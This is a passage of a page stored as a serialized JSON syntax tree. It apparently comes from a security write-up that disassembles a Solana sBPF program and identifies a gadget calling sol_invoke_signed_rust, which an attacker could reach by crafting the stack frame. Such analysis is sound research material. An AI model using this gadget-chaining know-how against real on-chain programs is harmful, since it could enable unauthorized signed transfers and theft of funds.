r3",{"type":26,"tag":137,"props":46789,"children":46790},{"style":5601},[46791],{"type":32,"value":46737},{"type":26,"tag":137,"props":46793,"children":46794},{"style":5584},[46795],{"type":32,"value":46742},{"type":26,"tag":137,"props":46797,"children":46798},{"style":5590},[46799],{"type":32,"value":6908},{"type":26,"tag":137,"props":46801,"children":46802},{"style":5626},[46803],{"type":32,"value":32441},{"type":26,"tag":137,"props":46805,"children":46806},{"style":5601},[46807],{"type":32,"value":46756},{"type":26,"tag":137,"props":46809,"children":46810},{"style":5584},[46811],{"type":32,"value":46812},"var_80",{"type":26,"tag":137,"props":46814,"children":46815},{"style":5601},[46816],{"type":32,"value":6507},{"type":26,"tag":137,"props":46818,"children":46819},{"class":5559,"line":5642},[46820,46825,46830,46834,46839,46843,46847,46851,46856,46860,46865],{"type":26,"tag":137,"props":46821,"children":46822},{"style":5584},[46823],{"type":32,"value":46824},"100001bb8",{"type":26,"tag":137,"props":46826,"children":46827},{"style":5584},[46828],{"type":32,"value":46829},"  79a468ff00000000",{"type":26,"tag":137,"props":46831,"children":46832},{"style":5584},[46833],{"type":32,"value":46727},{"type":26,"tag":137,"props":46835,"children":46836},{"style":5584},[46837],{"type":32,"value":46838}," r4",{"type":26,"tag":137,"props":46840,"children":46841},{"style":5601},[46842],{"type":32,"value":46737},{"type":26,"tag":137,"props":46844,"children":46845},{"style":5584},[46846],{"type":32,"value":46742},{"type":26,"tag":137,"props":46848,"children":46849},{"style":5590},[46850],{"type":32,"value":6908},{"type":26,"tag":137,"props":46852,"children":46853},{"style":5626},[46854],{"type":32,"value":46855},"152",{"type":26,"tag":137,"props":46857,"children":46858},{"style":5601},[46859],{"type":32,"value":46756},{"type":26,"tag":137,"props":46861,"children":46862},{"style":5584},[46863],{"type":32,"value":46864},"var_98",{"type":26,"tag":137,"props":46866,"children":46867},{"style":5601},[46868],{"type":32,"value":6507},{"type":26,"tag":137,"props":46870,"children":46871},{"class":5559,"line":5745},[46872,46877,46882,46886,46891,46895,46899,46903,46908,46912,46917],{"type":26,"tag":137,"props":46873,"children":46874},{"style":5584},[46875],{"type":32,"value":46876},"100001bc0",{"type":26,"tag":137,"props":46878,"children":46879},{"style":5584},[46880],{"type":32,"value":46881},"  79a570ff00000000",{"type":26,"tag":137,"props":46883,"children":46884},{"style":5584},[46885],{"type":32,"value":46727},{"type":26,"tag":137,"props":46887,"children":46888},{"style":5584},[46889],{"type":32,"value":46890}," r5",{"type":26,"tag":137,"props":46892,"children":46893},{"style":5601},[46894],{"type":32,"value":46737},{"type":26,"tag":137,"props":46896,"children":46897},{"style":5584},[46898],{"type":32,"value":46742},{"type":26,"tag":137,"props":46900,"children":46901},{"style":5590},[46902],{"type":32,"value":6908},{"type":26,"tag":137,"props":46904,"children":46905},{"style":5626},[46906],{"type":32,"value":46907},"144",{"type":26,"tag":137,"props":46909,"children":46910},{"style":5601},[46911],{"type":32,"value":46756},{"type":26,"tag":137,"props":46913,"children":46914},{"style":5584},[46915],{"type":32,"value":46916},"var_90",{"type":26,"tag":137,"props":46918,"children":46919},{"style":5601},[46920],{"type":32,"value":6507},{"type":26,"tag":137,"props":46922,"children":46923},{"class":5559,"line":5850},[46924,46929,46934,46939],{"type":26,"tag":137,"props":46925,"children":46926},{"style":5584},[46927],{"type":32,"value":46928},"100001bc8",{"type":26,"tag":137,"props":46930,"children":46931},{"style":5626},[46932],{"type":32,"value":46933},"  8520000020100000",{"type":26,"tag":137,"props":46935,"children":46936},{"style":5584},[46937],{"type":32,"value":46938},"   call",{"type":26,"tag":137,"props":46940,"children":46941},{"style":5584},[46942],{"type":32,"value":46943}," sol_invoke_signed_rust\n",{"type":26,"tag":137,"props":46945,"children":46946},{"class":5559,"line":5878},[46947,46952,46957,46962,46966,46970,46974,46978,46983,46987],{"type":26,"tag":137,"props":46948,"children":46949},{"style":5584},[46950],{"type":32,"value":46951},"100001bd0",{"type":26,"tag":137,"props":46953,"children":46954},{"style":5626},[46955],{"type":32,"value":46956},"  5500040000000000",{"type":26,"tag":137,"props":46958,"children":46959},{"style":5584},[46960],{"type":32,"value":46961},"   jne",{"type":26,"tag":137,"props":46963,"children":46964},{"style":5601},[46965],{"type":32,"value":11305},{"type":26,"tag":137,"props":46967,"children":46968},{"style":5590},[46969],{"type":32,"value":356},{"type":26,"tag":137,"props":46971,"children":46972},{"style":5626},[46973],{"type":32,"value":3235},{"type":26,"tag":137,"props":46975,"children":46976},{"style":5601},[46977],{"type":32,"value":8406},{"type":26,"tag":137,"props":46979,"children":46980},{"style":5584},[46981],{"type":32,"value":46982},"r0",{"type":26,"tag":137,"props":46984,"children":46985},{"style":5601},[46986],{"type":32,"value":1108},{"type":26,"tag":137,"props":46988,"children":46989},{"style":5626},[46990],{"type":32,"value":46991},"0x0\n",{"type":26,"tag":137,"props":46993,"children":46994},{"class":5559,"line":5891},[46995],{"type":26,"tag":137,"props":46996,"children":46997},{"emptyLinePlaceholder":18},[46998],{"type":32,"value":6276},{"type":26,"tag":137,"props":47000,"children":47001},{"class":5559,"line":5909},[47002,47007,47012,47017,47022,47026],{"type":26,"tag":137,"props":47003,"children":47004},{"style":5584},[47005],{"type":32,"value":47006},"100001bd8",{"type":26,"tag":137,"props":47008,"children":47009},{"style":5584},[47010],{"type":32,"value":47011},"  b701000018000000",{"type":26,"tag":137,"props":47013,"children":47014},{"style":5584},[47015],{"type":32,"value":47016},"   mov",{"type":26,"tag":137,"props":47018,"children":47019},{"style":5584},[47020],{"type":32,"value":47021}," r1",{"type":26,"tag":137,"props":47023,"children":47024},{"style":5601},[47025],{"type":32,"value":1108},{"type":26,"tag":137,"props":47027,"children":47028},{"style":5626},[47029],{"type":32,"value":47030},"0x18\n",{"type":26,"tag":137,"props":47032,"children":47033},{"class":5559,"line":5930},[47034,47039,47044,47048,47052,47056,47060,47064,47069,47073,47078],{"type":26,"tag":137,"props":47035,"children":47036},{"style":5584},[47037],{"type":32,"value":47038},"100001be0",{"type":26,"tag":137,"props":47040,"children":47041},{"style":5584},[47042],{"type":32,"value":47043},"  79a288ff00000000",{"type":26,"tag":137,"props":47045,"children":47046},{"style":5584},[47047],{"type":32,"value":46727},{"type":26,"tag":137,"props":47049,"children":47050},{"style":5584},[47051],{"type":32,"value":46732},{"type":26,"tag":137,"props":47053,"children":47054},{"style":5601},[47055],{"type":32,"value":46737},{"type":26,"tag":137,"props":47057,"children":47058},{"style":5584},[47059],{"type":32,"value":46742},{"type":26,"tag":137,"props":47061,"children":47062},{"style":5590},[47063],{"type":32,"value":6908},{"type":26,"tag":137,"props":47065,"children":47066},{"style":5626},[47067],{"type":32,"value":47068},"120",{"type":26,"tag":137,"props":47070,"children":47071},{"style":5601},[47072],{"type":32,"value":46756},{"type":26,"tag":137,"props":47074,"children":47075},{"style":5584},[47076],{"type":32,"value":47077},"var_78",{"type":26,"tag":137,"props":47079,"children":47080},{"style":5601},[47081],{"type":32,"value":6507},{"type":26,"tag":137,"props":47083,"children":47084},{"class":5559,"line":5939},[47085,47090,47095,47100,47104,47109,47113,47117,47121,47126,47131,47136],{"type":26,"tag":137,"props":47086,"children":47087},{"style":5584},[47088],{"type":32,"value":47089},"100001be8",{"type":26,"tag":137,"props":47091,"children":47092},{"style":5626},[47093],{"type":32,"value":47094},"  6312000000000000",{"type":26,"tag":137,"props":47096,"children":47097},{"style":5584},[47098],{"type":32,"value":47099},"   stxw",{"type":26,"tag":137,"props":47101,"children":47102},{"style":5601},[47103],{"type":32,"value":25612},{"type":26,"tag":137,"props":47105,"children":47106},{"style":5584},[47107],{"type":32,"value":47108},"r2",{"type":26,"tag":137,"props":47110,"children":47111},{"style":5590},[47112],{"type":32,"value":6908},{"type":26,"tag":137,"props":47114,"children":47115},{"style":5626},[47116],{"type":32,"value":1817},{"type":26,"tag":137,"props":47118,"children":47119},{"style":5601},[47120],{"type":32,"value":25640},{"type":26,"tag":137,"props":47122,"children":47123},{"style":5584},[47124],{"type":32,"value":47125},"r1",{"type":26,"tag":137,"props":47127,"children":47128},{"style":5601},[47129],{"type":32,"value":47130},"  {",{"type":26,"tag":137,"props":47132,"children":47133},{"style":5626},[47134],{"type":32,"value":47135},"0x18",{"type":26,"tag":137,"props":47137,"children":47138},{"style":5601},[47139],{"type":32,"value":6507},{"type":26,"tag":137,"props":47141,"children":47142},{"class":5559,"line":6191},[47143,47148,47153,47158,47162,47166,47170],{"type":26,"tag":137,"props":47144,"children":47145},{"style":5584},[47146],{"type":32,"value":47147},"100001bf0",{"type":26,"tag":137,"props":47149,"children":47150},{"style":5626},[47151],{"type":32,"value":47152},"  0500030000000000",{"type":26,"tag":137,"props":47154,"children":47155},{"style":5584},[47156],{"type":32,"value":47157},"   ja",{"type":26,"tag":137,"props":47159,"children":47160},{"style":5601},[47161],{"type":32,"value":11305},{"type":26,"tag":137,"props":47163,"children":47164},{"style":5590},[47165],{"type":32,"value":356},{"type":26,"tag":137,"props":47167,"children":47168},{"style":5626},[47169],{"type":32,"value":344},{"type":26,"tag":137,"props":47171,"children":47172},{"style":5601},[47173],{"type":32,"value":8577},{"type":26,"tag":137,"props":47175,"children":47176},{"class":5559,"line":6208},[47177],{"type":26,"tag":137,"props":47178,"children":47179},{"emptyLinePlaceholder":18},[47180],{"type":32,"value":6276},{"type":26,"tag":137,"props":47182,"children":47183},{"class":5559,"line":6225},[47184,47189,47194,47198,47202,47206,47210,47214,47218,47222,47226],{"type":26,"tag":137,"props":47185,"children":47186},{"style":5584},[47187],{"type":32,"value":47188},"100001bf8",{"type":26,"tag":137,"props":47190,"children":47191},{"style":5584},[47192],{"type":32,"value":47193},"  79a188ff00000000",{"type":26,"tag":137,"props":47195,"children":47196},{"style":5584},[47197],{"type":32,"value":46727},{"type":26,"tag":137,"props":47199,"children":47200},{"style":5584},[47201],{"type":32,"value":47021},{"type":26,"tag":137,"props":47203,"children":47204},{"style":5601},[47205],{"type":32,"value":46737},{"type":26,"tag":137,"props":47207,"children":47208},{"style":5584},[47209],{"type":32,"value":46742},{"type":26,"tag":137,"props":47211,"children":47212},{"style":5590},[47213],{"type":32,"value":6908},{"type":26,"tag":137,"props":47215,"children":47216},{"style":5626},[47217],{"type":32,"value":47068},{"type":26,"tag":137,"props":47219,"children":47220},{"style":5601},[47221],{"type":32,"value":46756},{"type":26,"tag":137,"props":47223,"children":47224},{"style":5584},[47225],{"type":32,"value":47077},{"type":26,"tag":137,"props":47227,"children":47228},{"style":5601},[47229],{"type":32,"value":6507},{"type":26,"tag":137,"props":47231,"children":47232},{"class":5559,"line":6238},[47233,47238,47243,47247,47251,47255],{"type":26,"tag":137,"props":47234,"children":47235},{"style":5584},[47236],{"type":32,"value":47237},"100001c00",{"type":26,"tag":137,"props":47239,"children":47240},{"style":5584},[47241],{"type":32,"value":47242},"  bf02000000000000",{"type":26,"tag":137,"props":47244,"children":47245},{"style":5584},[47246],{"type":32,"value":47016},{"type":26,"tag":137,"props":47248,"children":47249},{"style":5584},[47250],{"type":32,"value":46732},{"type":26,"tag":137,"props":47252,"children":47253},{"style":5601},[47254],{"type":32,"value":1108},{"type":26,"tag":137,"props":47256,"children":47257},{"style":5584},[47258],{"type":32,"value":47259},"r0\n",{"type":26,"tag":137,"props":47261,"children":47262},{"class":5559,"line":6247},[47263,47268,47273,47277,47282,47286,47291,47295,47299,47304,47308,47312,47317,47322,47326,47330],{"type":26,"tag":137,"props":47264,"children":47265},{"style":5584},[47266],{"type":32,"value":47267},"100001c08",{"type":26,"tag":137,"props":47269,"children":47270},{"style":5626},[47271],{"type":32,"value":47272},"  8510000075000000",{"type":26,"tag":137,"props":47274,"children":47275},{"style":5584},[47276],{"type":32,"value":46938},{"type":26,"tag":137,"props":47278,"children":47279},{"style":6009},[47280],{"type":32,"value":47281}," _ZN94_",{"type":26,"tag":137,"props":47283,"children":47284},{"style":5590},[47285],{"type":32,"value":12878},{"type":26,"tag":137,"props":47287,"children":47288},{"style":6009},[47289],{"type":32,"value":47290},"LT",{"type":26,"tag":137,"props":47292,"children":47293},{"style":5590},[47294],{"type":32,"value":12878},{"type":26,"tag":137,"props":47296,"children":47297},{"style":5584},[47298],{"type":32,"value":16244},{"type":26,"tag":137,"props":47300,"children":47301},{"style":5590},[47302],{"type":32,"value":47303},"...$",{"type":26,"tag":137,"props":47305,"children":47306},{"style":5584},[47307],{"type":32,"value":10627},{"type":26,"tag":137,"props":47309,"children":47310},{"style":5590},[47311],{"type":32,"value":12878},{"type":26,"tag":137,"props":47313,"children":47314},{"style":6009},[47315],{"type":32,"value":47316},"GT",{"type":26,"tag":137,"props":47318,"children":47319},{"style":5590},[47320],{"type":32,"value":47321},"$$",{"type":26,"tag":137,"props":47323,"children":47324},{"style":6009},[47325],{"type":32,"value":47316},{"type":26,"tag":137,"props":47327,"children":47328},{"style":5590},[47329],{"type":32,"value":12878},{"type":26,"tag":137,"props":47331,"children":47332},{"style":5601},[47333],{"type":32,"value":47334},"4from17ha0d289b72861b06dE\n",{"type":26,"tag":137,"props":47336,"children":47337},{"class":5559,"line":6270},[47338],{"type":26,"tag":137,"props":47339,"children":47340},{"emptyLinePlaceholder":18},[47341],{"type":32,"value":6276},{"type":26,"tag":137,"props":47343,"children":47344},{"class":5559,"line":6279},[47345,47350,47355,47359,47363,47367,47371,47375,47380,47384,47389],{"type":26,"tag":137,"props":47346,"children":47347},{"style":5584},[47348],{"type":32,"value":47349},"100001c10",{"type":26,"tag":137,"props":47351,"children":47352},{"style":5584},[47353],{"type":32,"value":47354},"  79a2b8ff00000000",{"type":26,"tag":137,"props":47356,"children":47357},{"style":5584},[47358],{"type":32,"value":46727},{"type":26,"tag":137,"props":47360,"children":47361},{"style":5584},[47362],{"type":32,"value":46732},{"type":26,"tag":137,"props":47364,"children":47365},{"style":5601},[47366],{"type":32,"value":46737},{"type":26,"tag":137,"props":47368,"children":47369},{"style":5584},[47370],{"type":32,"value":46742},{"type":26,"tag":137,"props":47372,"children":47373},{"style":5590},[47374],{"type":32,"value":6908},{"type":26,"tag":137,"props":47376,"children":47377},{"style":5626},[47378],{"type":32,"value":47379},"72",{"type":26,"tag":137,"props":47381,"children":47382},{"style":5601},[47383],{"type":32,"value":46756},{"type":26,"tag":137,"props":47385,"children":47386},{"style":5584},[47387],{"type":32,"value":47388},"var_48",{"type":26,"tag":137,"props":47390,"children":47391},{"style":5601},[47392],{"type":32,"value":6507},{"type":26,"tag":137,"props":47394,"children":47395},{"class":5559,"line":6288},[47396,47401,47406,47411,47415,47419,47423,47427,47431,47435],{"type":26,"tag":137,"props":47397,"children":47398},{"style":5584},[47399],{"type":32,"value":47400},"100001c18",{"type":26,"tag":137,"props":47402,"children":47403},{"style":5626},[47404],{"type":32,"value":47405},"  1502040000000000",{"type":26,"tag":137,"props":47407,"children":47408},{"style":5584},[47409],{"type":32,"value":47410},"   jeq",{"type":26,"tag":137,"props":47412,"children":47413},{"style":5601},[47414],{"type":32,"value":11305},{"type":26,"tag":137,"props":47416,"children":47417},{"style":5590},[47418],{"type":32,"value":356},{"type":26,"tag":137,"props":47420,"children":47421},{"style":5626},[47422],{"type":32,"value":3235},{"type":26,"tag":137,"props":47424,"children":47425},{"style":5601},[47426],{"type":32,"value":8406},{"type":26,"tag":137,"props":47428,"children":47429},{"style":5584},[47430],{"type":32,"value":47108},{"type":26,"tag":137,"props":47432,"children":47433},{"style":5601},[47434],{"type":32,"value":1108},{"type":26,"tag":137,"props":47436,"children":47437},{"style":5626},[47438],{"type":32,"value":46991},{"type":26,"tag":137,"props":47440,"children":47441},{"class":5559,"line":6355},[47442],{"type":26,"tag":137,"props":47443,"children":47444},{"emptyLinePlaceholder":18},[47445],{"type":32,"value":6276},{"type":26,"tag":137,"props":47447,"children":47448},{"class":5559,"line":6363},[47449,47454,47459,47464,47468,47472],{"type":26,"tag":137,"props":47450,"children":47451},{"style":5584},[47452],{"type":32,"value":47453},"100001c20",{"type":26,"tag":137,"props":47455,"children":47456},{"style":5626},[47457],{"type":32,"value":47458},"  2702000022000000",{"type":26,"tag":137,"props":47460,"children":47461},{"style":5584},[47462],{"type":32,"value":47463},"   mul",{"type":26,"tag":137,"props":47465,"children":47466},{"style":5584},[47467],{"type":32,"value":46732},{"type":26,"tag":137,"props":47469,"children":47470},{"style":5601},[47471],{"type":32,"value":1108},{"type":26,"tag":137,"props":47473,"children":47474},{"style":5626},[47475],{"type":32,"value":47476},"0x22\n",{"type":26,"tag":137,"props":47478,"children":47479},{"class":5559,"line":6393},[47480,47485,47490,47494,47498,47502,47506,47510,47515,47519,47524],{"type":26,"tag":137,"props":47481,"children":47482},{"style":5584},[47483],{"type":32,"value":47484},"100001c28",{"type":26,"tag":137,"props":47486,"children":47487},{"style":5584},[47488],{"type":32,"value":47489},"  79a1b0ff00000000",{"type":26,"tag":137,"props":47491,"children":47492},{"style":5584},[47493],{"type":32,"value":46727},{"type":26,"tag":137,"props":47495,"children":47496},{"style":5584},[47497],{"type":32,"value":47021},{"type":26,"tag":137,"props":47499,"children":47500},{"style":5601},[47501],{"type":32,"value":46737},{"type":26,"tag":137,"props":47503,"children":47504},{"style":5584},[47505],{"type":32,"value":46742},{"type":26,"tag":137,"props":47507,"children":47508},{"style":5590},[47509],{"type":32,"value":6908},{"type":26,"tag":137,"props":47511,"children":47512},{"style":5626},[47513],{"type":32,"value":47514},"80",{"type":26,"tag":137,"props":47516,"children":47517},{"style":5601},[47518],{"type":32,"value":46756},{"type":26,"tag":137,"props":47520,"children":47521},{"style":5584},[47522],{"type":32,"value":47523},"var_50",{"type":26,"tag":137,"props":47525,"children":47526},{"style":5601},[47527],{"type":32,"value":6507},{"type":26,"tag":137,"props":47529,"children":47530},{"class":5559,"line":6401},[47531,47536,47541,47545,47549,47553],{"type":26,"tag":137,"props":47532,"children":47533},{"style":5584},[47534],{"type":32,"value":47535},"100001c30",{"type":26,"tag":137,"props":47537,"children":47538},{"style":5584},[47539],{"type":32,"value":47540},"  b703000001000000",{"type":26,"tag":137,"props":47542,"children":47543},{"style":5584},[47544],{"type":32,"value":47016},{"type":26,"tag":137,"props":47546,"children":47547},{"style":5584},[47548],{"type":32,"value":46787},{"type":26,"tag":137,"props":47550,"children":47551},{"style":5601},[47552],{"type":32,"value":1108},{"type":26,"tag":137,"props":47554,"children":47555},{"style":5626},[47556],{"type":32,"value":47557},"0x1\n",{"type":26,"tag":137,"props":47559,"children":47560},{"class":5559,"line":6433},[47561,47566,47571,47575],{"type":26,"tag":137,"props":47562,"children":47563},{"style":5584},[47564],{"type":32,"value":47565},"100001c38",{"type":26,"tag":137,"props":47567,"children":47568},{"style":5584},[47569],{"type":32,"value":47570},"  8510000003feffff",{"type":26,"tag":137,"props":47572,"children":47573},{"style":5584},[47574],{"type":32,"value":46938},{"type":26,"tag":137,"props":47576,"children":47577},{"style":5584},[47578],{"type":32,"value":47579}," __rust_dealloc\n",{"type":26,"tag":137,"props":47581,"children":47582},{"class":5559,"line":6441},[47583],{"type":26,"tag":137,"props":47584,"children":47585},{"emptyLinePlaceholder":18},[47586],{"type":32,"value":6276},{"type":26,"tag":137,"props":47588,"children":47589},{"class":5559,"line":6501},[47590,47595,47600,47604,47608,47612,47616,47620,47625,47629,47634],{"type":26,"tag":137,"props":47591,"children":47592},{"style":5584},[47593],{"type":32,"value":47594},"100001c40",{"type":26,"tag":137,"props":47596,"children":47597},{"style":5584},[47598],{"type":32,"value":47599},"  79a2d0ff00000000",{"type":26,"tag":137,"props":47601,"children":47602},{"style":5584},[47603],{"type":32,"value":46727},{"type":26,"tag":137,"props":47605,"children":47606},{"style":5584},[47607],{"type":32,"value":46732},{"type":26,"tag":137,"props":47609,"children":47610},{"style":5601},[47611],{"type":32,"value":46737},{"type":26,"tag":137,"props":47613,"children":47614},{"style":5584},[47615],{"type":32,"value":46742},{"type":26,"tag":137,"props":47617,"children":47618},{"style":5590},[47619],{"type":32,"value":6908},{"type":26,"tag":137,"props":47621,"children":47622},{"style":5626},[47623],{"type":32,"value":47624},"48",{"type":26,"tag":137,"props":47626,"children":47627},{"style":5601},[47628],{"type":32,"value":46756},{"type":26,"tag":137,"props":47630,"children":47631},{"style":5584},[47632],{"type":32,"value":47633},"var_30",{"type":26,"tag":137,"props":47635,"children":47636},{"style":5601},[47637],{"type":32,"value":6507},{"type":26,"tag":137,"props":47639,"children":47640},{"class":5559,"line":11634},[47641,47646,47651,47655,47659,47663,47667,47671,47675,47679],{"type":26,"tag":137,"props":47642,"children":47643},{"style":5584},[47644],{"type":32,"value":47645},"100001c48",{"type":26,"tag":137,"props":47647,"children":47648},{"style":5626},[47649],{"type":32,"value":47650},"  1502030000000000",{"type":26,"tag":137,"props":47652,"children":47653},{"style":5584},[47654],{"type":32,"value":47410},{"type":26,"tag":137,"props":47656,"children":47657},{"style":5601},[47658],{"type":32,"value":11305},{"type":26,"tag":137,"props":47660,"children":47661},{"style":5590},[47662],{"type":32,"value":356},{"type":26,"tag":137,"props":47664,"children":47665},{"style":5626},[47666],{"type":32,"value":344},{"type":26,"tag":137,"props":47668,"children":47669},{"style":5601},[47670],{"type":32,"value":8406},{"type":26,"tag":137,"props":47672,"children":47673},{"style":5584},[47674],{"type":32,"value":47108},{"type":26,"tag":137,"props":47676,"children":47677},{"style":5601},[47678],{"type":32,"value":1108},{"type":26,"tag":137,"props":47680,"children":47681},{"style":5626},[47682],{"type":32,"value":46991},{"type":26,"tag":137,"props":47684,"children":47685},{"class":5559,"line":11652},[47686],{"type":26,"tag":137,"props":47687,"children":47688},{"emptyLinePlaceholder":18},[47689],{"type":32,"value":6276},{"type":26,"tag":137,"props":47691,"children":47692},{"class":5559,"line":11697},[47693,47698,47703,47707,47711,47715,47719,47723,47728,47732,47737],{"type":26,"tag":137,"props":47694,"children":47695},{"style":5584},[47696],{"type":32,"value":47697},"100001c50",{"type":26,"tag":137,"props":47699,"children":47700},{"style":5584},[47701],{"type":32,"value":47702},"  79a1c8ff00000000",{"type":26,"tag":137,"props":47704,"children":47705},{"style":5584},[47706],{"type":32,"value":46727},{"type":26,"tag":137,"props":47708,"children":47709},{"style":5584},[47710],{"type":32,"value":47021},{"type":26,"tag":137,"props":47712,"children":47713},{"style":5601},[47714],{"type":32,"value":46737},{"type":26,"tag":137,"props":47716,"children":47717},{"style":5584},[47718],{"type":32,"value":46742},{"type":26,"tag":137,"props":47720,"children":47721},{"style":5590},[47722],{"type":32,"value":6908},{"type":26,"tag":137,"props":47724,"children":47725},{"style":5626},[47726],{"type":32,"value":47727},"56",{"type":26,"tag":137,"props":47729,"children":47730},{"style":5601},[47731],{"type":32,"value":46756},{"type":26,"tag":137,"props":47733,"children":47734},{"style":5584},[47735],{"type":32,"value":47736},"var_38",{"type":26,"tag":137,"props":47738,"children":47739},{"style":5601},[47740],{"type":32,"value":6507},{"type":26,"tag":137,"props":47742,"children":47743},{"class":5559,"line":11803},[47744,47749,47753,47757,47761,47765],{"type":26,"tag":137,"props":47745,"children":47746},{"style":5584},[47747],{"type":32,"value":47748},"100001c58",{"type":26,"tag":137,"props":47750,"children":47751},{"style":5584},[47752],{"type":32,"value":47540},{"type":26,"tag":137,"props":47754,"children":47755},{"style":5584},[47756],{"type":32,"value":47016},{"type":26,"tag":137,"props":47758,"children":47759},{"style":5584},[47760],{"type":32,"value":46787},{"type":26,"tag":137,"props":47762,"children":47763},{"style":5601},[47764],{"type":32,"value":1108},{"type":26,"tag":137,"props":47766,"children":47767},{"style":5626},[47768],{"type":32,"value":47557},{"type":26,"tag":137,"props":47770,"children":47771},{"class":5559,"line":26089},[47772,47777,47782,47786],{"type":26,"tag":137,"props":47773,"children":47774},{"style":5584},[47775],{"type":32,"value":47776},"100001c60",{"type":26,"tag":137,"props":47778,"children":47779},{"style":5584},[47780],{"type":32,"value":47781},"  85100000fefdffff",{"type":26,"tag":137,"props":47783,"children":47784},{"style":5584},[47785],{"type":32,"value":46938},{"type":26,"tag":137,"props":47787,"children":47788},{"style":5584},[47789],{"type":32,"value":47579},{"type":26,"tag":137,"props":47791,"children":47792},{"class":5559,"line":26124},[47793],{"type":26,"tag":137,"props":47794,"children":47795},{"emptyLinePlaceholder":18},[47796],{"type":32,"value":6276},{"type":26,"tag":137,"props":47798,"children":47799},{"class":5559,"line":26132},[47800,47805,47810,47815,47820,47825],{"type":26,"tag":137,"props":47801,"children":47802},{"style":5584},[47803],{"type":32,"value":47804},"100001c68",{"type":26,"tag":137,"props":47806,"children":47807},{"style":5626},[47808],{"type":32,"value":47809},"  9500000000000000",{"type":26,"tag":137,"props":47811,"children":47812},{"style":5584},[47813],{"type":32,"value":47814},"   exit",{"type":26,"tag":137,"props":47816,"children":47817},{"style":5601},[47818],{"type":32,"value":47819}," {",{"type":26,"tag":137,"props":47821,"children":47822},{"style":5584},[47823],{"type":32,"value":47824},"__return_addr",{"type":26,"tag":137,"props":47826,"children":47827},{"style":5601},[47828],{"type":32,"value":6507},{"type":26,"tag":35,"props":47830,"children":47831},{},[47832,47834,47840],{"type":32,"value":47833},"Which, assuming that ",{"type":26,"tag":130,"props":47835,"children":47837},{"className":47836},[],[47838],{"type":32,"value":47839},"sol_invoke_signed_rust",{"type":32,"value":47841}," returns 0, is doing the following:",{"type":26,"tag":4820,"props":47843,"children":47844},{},[47845,47854,47863],{"type":26,"tag":3430,"props":47846,"children":47847},{},[47848],{"type":26,"tag":130,"props":47849,"children":47851},{"className":47850},[],[47852],{"type":32,"value":47853},"sol_invoke_signed_rust(r1, [r10-136], [r10-128], [r10-152], [r10-144])",{"type":26,"tag":3430,"props":47855,"children":47856},{},[47857],{"type":26,"tag":130,"props":47858,"children":47860},{"className":47859},[],[47861],{"type":32,"value":47862},"*[r10-120] = 0x18",{"type":26,"tag":3430,"props":47864,"children":47865},{},[47866,47868,47874,47876,47883],{"type":32,"value":47867},"Calls ",{"type":26,"tag":130,"props":47869,"children":47871},{"className":47870},[],[47872],{"type":32,"value":47873},"__rust_dealloc",{"type":32,"value":47875},", which in default circumstances is a ",{"type":26,"tag":41,"props":47877,"children":47880},{"href":47878,"rel":47879},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/entrypoint.rs#L257C1-L259",[45],[47881],{"type":32,"value":47882},"NOP",{"type":32,"value":470},{"type":26,"tag":35,"props":47885,"children":47886},{},[47887],{"type":32,"value":47888},"r10 is the stack pointer, so it will point to the stack frame of the current depth when executing that instruction.",{"type":26,"tag":35,"props":47890,"children":47891},{},[47892],{"type":32,"value":47893},"If we correctly set up the stack frame used by this gadget with valid parameters, that's a win.",{"type":26,"tag":35,"props":47895,"children":47896},{},[47897,47899,47906],{"type":32,"value":47898},"Looking at the ",{"type":26,"tag":41,"props":47900,"children":47903},{"href":47901,"rel":47902},"https://github.com/solana-labs/solana/blob/master/sdk/program/src/syscalls/definitions.rs#L59",[45],[47904],{"type":32,"value":47905},"definition",{"type":32,"value":47907},", it's not crystal clear what the parameters are:",{"type":26,"tag":5512,"props":47909,"children":47911},{"className":5552,"code":47910,"language":5551,"meta":7,"style":7},"fn sol_invoke_signed_rust(instruction_addr: *const u8, account_infos_addr: *const u8, account_infos_len: u64, signers_seeds_addr: *const u8, signers_seeds_len: u64) -> u64\n",[47912],{"type":26,"tag":130,"props":47913,"children":47914},{"__ignoreMap":7},[47915],{"type":26,"tag":137,"props":47916,"children":47917},{"class":5559,"line":5560},[47918,47922,47927,47931,47936,47940,47944,47948,47952,47956,47961,47965,47969,47973,47977,47981,47986,47990,47994,47998,48003,48007,48011,48015,48019,48023,48028,48032,48036,48040,48044],{"type":26,"tag":137,"props":47919,"children":47920},{"style":5573},[47921],{"type":32,"value":22860},{"type":26,"tag":137,"props":47923,"children":47924},{"style":5682},[47925],{"type":32,"value":47926}," sol_invoke_signed_rust",{"type":26,"tag":137,"props":47928,"children":47929},{"style":5601},[47930],{"type":32,"value":165},{"type":26,"tag":137,"props":47932,"children":47933},{"style":5584},[47934],{"type":32,"value":47935},"instruction_addr",{"type":26,"tag":137,"props":47937,"children":47938},{"style":5590},[47939],{"type":32,"value":7072},{"type":26,"tag":137,"props":47941,"children":47942},{"style":5590},[47943],{"type":32,"value":12406},{"type":26,"tag":137,"props":47945,"children":47946},{"style":5573},[47947],{"type":32,"value":12244},{"type":26,"tag":137,"props":47949,"children":47950},{"style":6009},[47951],{"type":32,"value":17225},{"type":26,"tag":137,"props":47953,"children":47954},{"style":5601},[47955],{"type":32,"value":1108},{"type":26,"tag":137,"props":47957,"children":47958},{"style":5584},[47959],{"type":32,"value":47960},"account_infos_addr",{"type":26,"tag":137,"props":47962,"children":47963},{"style":5590},[47964],{"type":32,"value":7072},{"type":26,"tag":137,"props":47966,"children":47967},{"style":5590},[47968],{"type":32,"value":12406},{"type":26,"tag":137,"props":47970,"children":47971},{"style":5573},[47972],{"type":32,"value":12244},{"type":26,"tag":137,"props":47974,"children":47975},{"style":6009},[47976],{"type":32,"value":17225},{"type":26,"tag":137,"props":47978,"children":47979},{"style":5601},[47980],{"type":32,"value":1108},{"type":26,"tag":137,"props":47982,"children":47983},{"style":5584},[47984],{"type":32,"value":47985},"account_infos_len",{"type":26,"tag":137,"props":47987,"children":47988},{"style":5590},[47989],{"type":32,"value":7072},{"type":26,"tag":137,"props":47991,"children":47992},{"style":6009},[47993],{"type":32,"value":8445},{"type":26,"tag":137,"props":47995,"children":47996},{"style":5601},[47997],{"type":32,"value":1108},{"type":26,"tag":137,"props":47999,"children":48000},{"style":5584},[48001],{"type":32,"value":48002},"signers_seeds_addr",{"type":26,"tag":137,"props":48004,"children":48005},{"style":5590},[48006],{"type":32,"value":7072},{"type":26,"tag":137,"props":48008,"children":48009},{"style":5590},[48010],{"type":32,"value":12406},{"type":26,"tag":137,"props":48012,"children":48013},{"style":5573},[48014],{"type":32,"value